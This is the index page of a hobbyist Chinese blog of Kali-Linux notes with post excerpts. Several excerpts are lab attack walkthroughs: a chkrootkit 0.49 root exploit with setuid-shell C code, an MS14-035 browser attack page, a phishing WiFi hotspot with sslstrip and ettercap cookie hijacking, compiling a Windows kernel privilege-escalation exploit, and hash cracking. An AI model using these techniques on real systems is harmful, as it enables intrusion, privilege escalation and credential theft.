显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

Linux 折腾笔记

 
 
 
 
 
 
 
 

[置顶] 博客说明

2014-1-15 20:40:37 阅读19842 评论23 152014/01 Jan15

简单说明下:

本人工作和电脑扯不着边,所以玩电脑属于业余爱好,当然技术也属于这个档次;开博客也不是正真为了开博客,只是为了记录一些平常玩电脑时有意思的方法,以前这些方法是写在纸质笔记上的,弄丢多次,所以最后决定使用网络日志。

非常欢迎有共同兴趣爱好的朋友转载日志;虽然我写的多数方法来自网络,但记录在这里并公开的全是自己实际操作;如果记录的某个方法完全是安照某一篇文章操作的,在末尾都会注明原文出处;有些方法实在是被转烂了,以至于无法得知原文出处时只能作罢;所以我希望如果有朋友要完全引用(直接Crtl + V)本博日志,请一定注明日志出处。

           如果喜欢寒博内容,为了更方便阅读,可以将 《所有日志》 添加到书签或者订阅本博,实时查看更新,点此订阅:RSS

           个人IRC频道,欢迎有相同兴趣爱好的朋友交流讨论:#xiao106347 @irc.freenode.net

作者  | 2014-1-15 20:40:37 | 阅读(19842) |评论(23) | 阅读全文>>

利用“MS14-035”,对IE浏览器进行恶意攻击

2014-7-8 20:53:28 阅读5307 评论0 82014/07 July8

这个漏洞可以导致IE浏览器崩溃,涉及的版本有 ie8,9,10,微软在14年6月10日发布了更新补丁,所以现在只能攻击没有更新至今年6月10号的IE浏览器了。详情看这里:

http://www.exploit-db.com/exploits/33860/

如上面介绍,利用这个漏洞,我们需要一段html代码。下面我在本机演示下局域网攻击吧,靶机是安装在虚拟机中的win7_sp1-ie9:

首先修改本机 /var/www 目录下的 index.html 为以下内容:

<html>

<head>

<meta http-equiv="refresh" content="5;url=http://192.168.1.29/poc.html">

<title>YOU HAVE BEEN HACKED</title>

</head>

<body>

you have been hacked,and you will shutdown!!

</body>

</html>

这个是攻击目标首先打开的页面,页面首先显示 “you have been hacked,and you will shutdown!!”,装个逼先;

然后设置 refresh 的时间为5秒("refresh"content=5):

作者  | 2014-7-8 20:53:28 | 阅读(5307) |评论(0) | 阅读全文>>

Chkrootkit 0.49 本地提权漏洞

2014-7-7 2:08:57 阅读3118 评论1 72014/07 July7

Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提权漏洞。先来演示下吧:

可以查看自己安装的是不是升到最新版了,或者下载有漏洞的版本进行实验:

wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz

tar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz

cd chkrootkit-0.49/

./chkrootkit -V

普通用户在 /tmp 目录下新建 update.c(代码实示例如下):

#include <unistd.h>

void main(void)

{

system("chown root:root /tmp/update");

system("chmod 4755 /tmp/update");

setuid(0);

setgid(0);

execl("/bin/sh","sh",NULL);

}

然后编译好 update ,看下update的文件详情:

作者  | 2014-7-7 2:08:57 | 阅读(3118) |评论(1) | 阅读全文>>

Kali-Linux下创建一个钓鱼WiFi热点

2014-7-3 17:45:19 阅读50023 评论49 32014/07 July3

之前写过kali-linux下用 HostAPd+bridge-utils 搭建网桥的方式来创建wifi热点的日志,有兴趣可以在看下不同:

Kali-linux下使用HostAPd创建wifi热点(AP)

这里再介绍一种方法,是使用 airbase-ng + dhcpd 创建虚拟WiFi热点;顺便使用 sslstrip+ettercap 进行中间人攻击,嗅探使用者的上网信息和劫持cookie!

所需要的软件如下;kali-linux都已经自带了,其他的系统可以自行安装:

Aircrack-ng 套件    #用来发送数据

isc-dhcp-server    #简单的dhcp服务器

sslstrip       #突破ssl加密

ettercap      #嗅探劫持

leaf /etc/dhcp/dhcpd.conf   编辑dhcp服务器配置文件,修改如下:

authoritative;

default-lease-time 700;

max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {

作者  | 2014-7-3 17:45:19 | 阅读(50023) |评论(49) | 阅读全文>>

Ettercap 使用进阶(1):详细参数

2014-7-3 1:46:17 阅读10074 评论6 32014/07 July3

Ettercap是一个非常强大的中间人攻击工具;本博客之前日志也有多次涉猎,这里详细了解下ettercap的参数,算是入门篇。

参考下:

Ettercap结合sslstrip对ssl/https进行攻击记录利用ettercap进行简单的arp欺骗和mitm攻击过程Kali下使用ettercap+msf渗透WindowsXP

关于界面:

ettercap提供 4 种运行界面:

Text            #文本模式,参数 -T ,一般配合 -q(安静模式)使用Curses/GTK         #图形模式,参数 -C/-GDaemonize          #守护模式(后台模式),参数 -D

运行模式:

两种模式(UNIFIED和BRIDGED)

Unified                   #中间人模式,即两台终端间进行欺骗,参数 -M

Bridged           

作者  | 2014-7-3 1:46:17 | 阅读(10074) |评论(6) | 阅读全文>>

HTTrack:克隆一个网站页面到本地

2014-7-1 18:30:00 阅读6098 评论1 12014/07 July1

HTTrack 是一个自由开源的网络爬虫软件,它可以将一个网站的页面下载(克隆,或者镜像)到本地,供本地离线浏览。

安装:

apt-get install httrack

使用起来也比较简单:

直接一条命令执行:

httrack "http://xiao106347.blog.163.com" -O /heome/backup/myweb/  "+*.xiao106347.blog.163.com/*" -v

# "+*.xiao106347.blog.163.com/*" 表示以 "*.xiao106347.blog.163.com/" 开头的所有页面,当然这里也可以直接是 "+http://xiao106347.blog.163.com/*",因为网易博客前面就只有 http!

或者先打开 httrack ,然后按照提示一步步设置:

看下效果图(我使用的窗口特效,下面的特效还没有来的急消失就被截下来了,所以看起来有点诡异,无视掉好了!):

作者  | 2014-7-1 18:30:00 | 阅读(6098) |评论(1) | 阅读全文>>

Kali_linux_x64安装Compiz

2014-7-1 6:08:38 阅读7428 评论6 12014/07 July1

64位Kali-linux安装 compiz ;逛 youtube 的时候看到有人写了kali-linux安装compiz的小脚本和一些必须组件,转了过来,分享如下:

文件名 :KaliCompizx64.tar.gz

下载地址:http://pan.baidu.com/s/1hqiQaTQ

安装方法:

tar vfxz KaliCompizx64.tar.gz

cd KaliCompizx64/

./KaliCompizx64.sh

完成后执行 compiz 开启效果,也可以在 ‘启动应用程序’ 里添加 compiz 的启动项,名字和命令都是 compiz,保证开机同时开启特效。

简单设置了几个效果(配合我的主题 muniux,效果比较不错):

高清视频地址:http://pan.baidu.com/s/1eQrHEHO

在线观看:

作者  | 2014-7-1 6:08:38 | 阅读(7428) |评论(6) | 阅读全文>>

提权神器:Windows NT EPATHOBJ Local Ring0 Exploit

2014-6-30 13:50:41 阅读6818 评论11 302014/06 June30

这个是2013年6月公布的windows nt内核本地提权0day漏洞(CVE-2013-3660),不过很快微软就在2013年7月更新补丁中修复了这个漏洞;这个漏洞涉及的windows版本有 XP, Vista, 7, 8, 2003, 2008 , 2012。

演示下利用过程:

首先在 Exploit-DB 下载 c 源码,下载地址:http://www.exploit-db.com/exploits/25912/

这里我们将源码保存为 CVE-2013-3660.c ,然后在windows下用 VS 10进行编译。

进入 C:\Program FIles <x86>\Microsoft Visual Studio 10.0\VC\bin 目录,

然后执行命令: vcvars32.bat x86

然后把我们下载的源码 CVE-2013-3660.c 复制到 C:\Program FIles <x86>\Microsoft Visual Studio 10.0\VC\bin 目录,然后进行编译:

cl CVE-2013-3660.c 

在当前目录下生成 CVE-2013-3360.exe 可执行文件

OK,这个

作者  | 2014-6-30 13:50:41 | 阅读(6818) |评论(11) | 阅读全文>>

LAMP+WordPress的搭建

2014-6-29 14:55:22 阅读6880 评论0 292014/06 June29

搭建LAMP(Linux+Apache+Mysql+Php)+WordPress;

我在自己本机上做个演示吧!

安装:

因为笔者使用的是kali-linux,LAMP(Linux+Apache+Mysql+Php)环境是默认安装好的,其实其他linux平台安装也很简单:

sudo apt-get install apache2

sudo apt-get install php5

sudo apt-get install mysql-server

sudo apt-get install mysql-client

sudo apt-get install php5-mysql

sudo apt-get install phpmyadmin

安装时会要求输入账户密码,kali用户的默认账户root密码是空的,回车即可,也可以选择此时修改密码:

phpmyadmin password

然后输入新密码即可。

安装之后启动服务:

sudo /etc/init.d/apache2 start

sudo /etc/init.d/mysql start

创建数据库:

mysql -u root -p             #输入密码进入数据库

作者  | 2014-6-29 14:55:22 | 阅读(6880) |评论(0) | 阅读全文>>

在GitHub上托管你的项目

2014-6-27 17:01:35 阅读9301 评论0 272014/06 June27

在GitHub托管自己的项目,老手们估计都能闭着眼睛玩了,这里写一个入门的教程吧,面向新手。

1.首先在GitHub创建一个帐号:

地址:https://github.com

2.生成密钥验证身份:

ssh-keygen -C 'your@email.address' -t rsa

选择保存位置和密码,在保存位置可以看到密钥文件

然后把密钥文件 ‘id_rsa.pub’ 的所有内容复制到下图的 ‘key' 框中,标题随便

验证:

ssh -T git@github.com

3.create a new repository:

4.选择并上传

将新建的 repository 克隆到本地,如:

git clone https://github.com/xiao106347/muniux.git

将要托管的项目放到 'muniux' 文件夹,如这里 muniux_v1.1.deb

在 'repository' 文件夹(如这里 'muniux' ):

重新初始化现存的 Git 版本库

git init

建立跟踪

git add 'muniux_v1.1.deb'

提交创建:

git commit -m 'muniux_v1.1.deb'

建立连接:

git remote add origin https://github.com/xiao106347/muniux.git

作者  | 2014-6-27 17:01:35 | 阅读(9301) |评论(0) | 阅读全文>>

Chat With 'IRC'

2014-6-25 21:35:07 阅读6405 评论4 252014/06 June25

估计已经有很多人在用 IRC 了,这里写个普及性质的日志吧,面向还没有在用而想用的。

IRC是Internet Relay Chat 的英文缩写,一般称为互联网中继聊天,由芬兰人Jarkko Oikarinen于1988年首创。工作原理很简单:IRC 服务器上有很多由用户创建的频道(Channel),用户用客户端软件使用 IRC协议连接到这些服务器,并进入频道即可与在同一频道的用户开始聊天或者与其中一位私密交谈。

首先要安装有客户端软件,这里推荐几个Linux下的:

Hexchat          #图形模式

irssi           #命令行模式

smuxi         #图形模式

安装之后打开客户端软件,图形界面直接输入服务器地址和给自己随机取一个Nickname 然后点连接,连接成功之后输入要进入的 频道,然后进去就可以开始聊天了;命令行模式则需要用以下命令:

/connect    #连接服务器,后跟服务器地址

/join

作者  | 2014-6-25 21:35:07 | 阅读(6405) |评论(4) | 阅读全文>>

I2P: Welcome To The Darknet

2014-6-22 16:25:34 阅读10122 评论6 222014/06 June22

中文官方主页:https://geti2p.net/zh/

介绍

I2P is a project about darknet or anonymous-network, It provides strong privacy protections for communication over the Internet. Maybe you know Tor, and you also know tor cannoct work for you in this Special-Internet-Place.

Because Tor need to connect the central directory servers first when you start Tor,Of course these 'central directory servers' is unactived and you know the reason. While I2P is hard to 'hexie'! For the first time I2P in the initialization time need to be connected to the fixed I2P routers,If not,I2P will also cannot work for you; If connected successfuly, I2P will use the Kad algorithm (algorithm of eMule) to getpart of 

作者  | 2014-6-22 16:25:34 | 阅读(10122) |评论(6) | 阅读全文>>

Rfkill 管理计算机无线设备

2014-6-22 12:38:33 阅读2726 评论0 222014/06 June22

用RFKILL 管理计算机无线设备:

rfkill list           #查看无线设备

rfkill block 0         #关闭序号为0的无线设备

rfkill block all        #关闭所有无线设备

rfkill unblock all        #开启所有无线设备

详细说明,点此查看

作者  | 2014-6-22 12:38:33 | 阅读(2726) |评论(0) | 阅读全文>>

Wireshark使用入门

2014-6-22 12:05:53 阅读9378 评论3 222014/06 June22

擦,没时间写了,先挖个坑吧

解决报错:

[string "/usr/share/wireshark/init.lua"]:46: dofile has been disabled due to running Wireshark as superuser

打开 /usr/share/wireshark/init.lua 文件

将 dofile(DATA_DIR.."console.lua") 修改为 --dofile(DATA_DIR.."console.lua")

作者  | 2014-6-22 12:05:53 | 阅读(9378) |评论(3) | 阅读全文>>

Hash破解神器:Hashcat的简单使用

2014-6-10 21:02:42 阅读24123 评论1 102014/06 June10

Hashcat系列软件是比较牛逼的密码破解软件,系列软件包含Hashcat、oclHashcat;还有一个单独新出的oclRausscrack。其区别为Hashcat只支持cpu破解;oclHashcat和oclGausscrack则支持gpu加速。oclHashcat则分为AMD版和NIVDA版。

这里先折腾下Hashcat吧,gpu加速的那两货暂时玩不起来。

用这两Hash为例子吧:

xiao1063       6CCEDAEE32C9E5E233A000EC28381E44

10634747      25172D83A54A59BB034CB2EF08D9C75A

解释下参数:

hashcat  --help                 #查看帮助文档

General:

-m   (--hash-type=NUM)         #hash种类,下面有列表,后面跟对应数字

-a    (--attack-mode=NUM) 

作者  | 2014-6-10 21:02:42 | 阅读(24123) |评论(1) | 阅读全文>>

查看所有日志>>

 
 
 
 
 
 
 

海外 南非 处女座

 发消息  写留言

 
博客等级加载中...
今日访问加载中...
总访问量加载中...
最后登录加载中...
 
 
 
 
 
 
 
模块内容加载中...
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016

注册 登录  
 加关注